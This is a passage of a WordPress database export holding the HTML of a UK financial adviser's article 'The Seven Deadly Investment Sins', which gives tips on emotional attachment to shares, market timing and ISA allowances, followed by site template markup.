make mistakes and sadly you – and I – are no exceptions to that rule.</p>&#13;\n<p><span style=\"color: #0000ff;\">INVESTMENT TIP #5: GETTING SENTIMENTAL</span></p>&#13;\n<p>“That share owes me money!” If we had £1 for every time we’ve heard that phrase in the office then we’d be able to… well, not retire, but certainly eat in one of Manchester’s better restaurants. And that sort of emotion will do nothing but damage to your investment portfolio.</p>&#13;\n<p>If you bought a share at £2 and it’s now valued at 50p it does not “owe you” £1.50 times however many shares you bought. The same is true for a unit trust or any other investment. Fifty pence a share is what the market thinks those shares are worth today; what you paid has become irrelevant.</p>&#13;\n<p>And sorry to sound callous but shares and <span style=\"text-decoration: underline;\">investments don’t love you either</span>. You may have done very well out of XYZ Co in the past. But if they are under performing you have to take a logical view, end the romance and invest elsewhere.</p>&#13;\n<p><span style=\"color: #0000ff;\">INEVESTMENT TIP #6: WORRYING ABOUT TIMING</span></p>&#13;\n<p>“Shall I invest today? Shall I wait until tomorrow?”</p>&#13;\n<p>Far too many investors worry about timing, trying to buy at the very bottom of the market and sell at the very top. No-one manages to do this every time: it is far more important to save or invest consistently – and in line with your long-term goals – than it is to worry about getting your timing exactly right.</p>&#13;\n<p><span style=\"color: #0000ff;\">INVESTMENT TIP #7: PAYING TOO MUCH IN TAX</span></p>&#13;\n<p>We’ve saved the most obvious one until last. Don’t pay too much tax on your investments. Make the most of your Individual Savings Account allowance which is:</p>&#13;\n<ul><li>£11,520 for a stocks and shares ISA in the current tax year and</li>&#13;\n<li>£11,880 for the tax year which begins on April 6<sup>th</sup></li>&#13;\n</ul><p> </p>&#13;\n<p>Remember that husbands and wives <i>both</i> have an ISA allowance and that there are other allowances, such as your annual Capital Gains Tax allowance, which all too often go unused.</p>&#13;\n<p>Next Steps</p>&#13;\n<p>Arranging your investment options tax efficiently can make a significant difference to your returns over the long term, and we’re obviously happy to talk to you about how you can do this.</p>&#13;\n<p>In fact, if you have <i>any</i> questions about your investments or savings then and would benefit from some impartial investment advice – as always – we are only a phone call or an e-mail away.</p>&#13;\n<p>Call us today on<span style=\"color: #ff9900;\">  </span>to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to investment advice can make the difference you need.</p>&#13;\n<p>Warmest regards</p>&#13;\n<p>Sam<br/>&#13;\nEquity SMART</p>&#13;\n<p><b>The value of an investment and the income from it could go down as well as up. The return at the end of the investment period is not guaranteed and you may get back less than you originally invested</b></p>&#13;\n<p> </p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>It’s all so simple. To book a chat with our independent financial advisors.</h2><p>It\'s free, without obligation and impartial click the link or call free on .</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../seven-deadly-investment-sins/\" title=\"Comment on The Seven Deadly Investment Sins\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/seven-deadly-investment-sins/&amp;p[title]=The%20Seven%20Deadly%20Investment%20Sins\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=The+Seven+Deadly+Investment+Sins%20http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/seven-deadly-investment-sins/&amp;title=The%20Seven%20Deadly%20Investment%20Sins\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/seven-deadly-investment-sins/&amp;title=The%20Seven%20Deadly%20Investment%20Sins\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fseven-deadly-investment-sins%2F&amp;name=The+Seven+Deadly+Investment+Sins&amp;description=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=The Seven Deadly Investment Sins&amp;body=http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../seven-deadly-investment-sins/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7335\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"33a5d67bbe\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"215\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','&#13;\n	The Seven Deadly Investment Sins','An essential guide about how you can avoid the common investment mistakes - don\'t make these seven deadly investment sins','publish','closed','closed','','the-seven-deadly-investment-sins','','','2017-09-21 16:34:40','2017-09-21 16:34:40','',0,'http://www.equalitywalk.org.uk/the-seven-deadly-investment-sins',0,'page','',0),(104,1,'2017-09-21 16:34:40','2017-09-21 16:34:40','<body class=\"page page-id-93 page-child parent-pageid-25 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-93 current_page_item menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page 